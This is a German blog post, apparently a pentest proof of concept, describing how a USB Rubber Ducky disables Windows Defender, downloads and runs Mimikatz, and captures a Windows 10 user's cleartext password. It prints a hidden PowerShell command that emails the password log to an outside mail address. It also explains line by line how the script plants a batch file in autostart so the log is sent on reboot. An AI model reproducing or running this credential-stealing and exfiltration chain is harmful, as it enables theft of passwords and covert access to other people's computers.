Der Windows 10 Passwort Hack

Die Entwickler vom Mimikatz haben eine neue Version ihrer Software veröffentlicht. Nachdem das Auslesen der Passwörter in Klartext unter Windows 10  (1803 und 1809) und damit der Passwort Hack nicht mehr funktionierte, mussten sie reagieren.

In diesem Beitrag erkläre ich, wie man Windows 10 Passwörter in Klartext mit Hilfe des USB Rubber Ducky auslesen kann.

Die Entwickler bei Microsoft haben natürlich sofort reagiert und das zum Download angebotene Programm als Malware eingestuft. Der Windows Defender erkennt die Software als Behavior:Win32/Mikatz.gen!C bzw. HackTool:Win32/Mimikatz.E 

Dies erschwert natürlich den Einsatz ein wenig. Mir fallen spontan zwei Möglichkeiten ein, die Software auf einem aktuellen Windows 10-System zu testen.  Man könnte z.B. den mitgelieferten Quellcode nutzen, ihn ein wenig verändern und dann neu kompilieren. Ein Angreifer könnte auch den Virenschutz temporär abschalten, um Mimikatz einzusetzen. Da ich in einem früheren Test diesen Weg bereits gewählt hatte, entscheide ich mich für die zweite Möglichkeit. Als Hilfsmittel kommt wieder der USB Rubber Ducky zum Einsatz.

Ich möchte mit Hilfe des Ducky das Passwort des angemeldeten Nutzers in Klartext auslesen und per E-Mail an einen Mailserver senden. Das folgende Bild beschreibt meine Vorgehensweise:

Vorbereitende Maßnahmen:

Damit der der Windows 10 Passwort Hack funktioniert, hinterlege ich die heruntergeladene Datei Mimikatz.exe und eine Batchdatei auf einem Webserver. Diese enthält Anweisungen zum Versand der Logdatei (mimilsa.log), die beim Ausführen von Mimikatz im Verzeichnis C:\Windows\System32 angelegt wird. Sie enthält später die Passwörter. Die Batchdatei zum Versenden einer E-Mail mittels Google-Mail könnte wie folgt aussehen:

powershell.exe -NoP -NonI -W Hidden -Command "Send-MailMessage -From "absender@gmail.com" -to 'empfaenger@domaene.com' -Attachments C:WindowsSystem32mimilsa.log -Subject "Windows_Passwords" -Body 'Pentestit.de Proof of Concept' -SmtpServer 'smtp.gmail.com' -Credential (New-Object PSCredential('absender@gmail.com',(ConvertTo-SecureString 'password' -AsPlainText -Force))) -UseSSL -Port 587"
									

  

Skript erstellen:

Das Ducky-Skript enthält allen Anweisungen, die für diesen Hack notwendig sind. Zur besseren Veranschaulichung habe ich die Zeilen durchnummeriert.

Zeile 13-18

Hier wird Powershell in der Konsole mit administrativen Rechten gestartet.

Zeile 23

Hier setzen wir den Windows Defender zeitweilig außer Kraft. Dies sollte eine kurze Zeit anhalten. Manchmal bleibt dieser Zustand bis zu einem Neustart des PC erhalten. Die Zeit reicht auf alle Fälle aus, um Mimikatz herunterzuladen und zu starten.

Zeile 26-35

Mit diesen Befehlen laden Sie die Batchdatei email.bat (zum Versand der E-Mail) herunter und speichern diese als setup.bat im Autostart-Verzeichnis des angemeldeten Nutzers ab. Danach wird Mimikatz heruntergeladen und ausgeführt.

Zeile 42

Hiermit wird Mimikatz im Arbeitsspeicher ausgeführt. Nun können alle Fenster geschlossen werden.

Zeile 53

Mit dieser Tastenkombination sperren Sie den Bildschirm, sodass ein Nutzer ein Passwort eingeben muss, um den Computer zu nutzen. Dieses Passwort wird nun in die Logdatei von Mimikatz geschrieben. Beim nächsten Neustart des PC wird diese Datei dann an den Angreifer verschickt.

Das nachfolgende Video zeigt die Vorgehensweise im Windows 10 Passwort Hack:

Schreibe einen Kommentar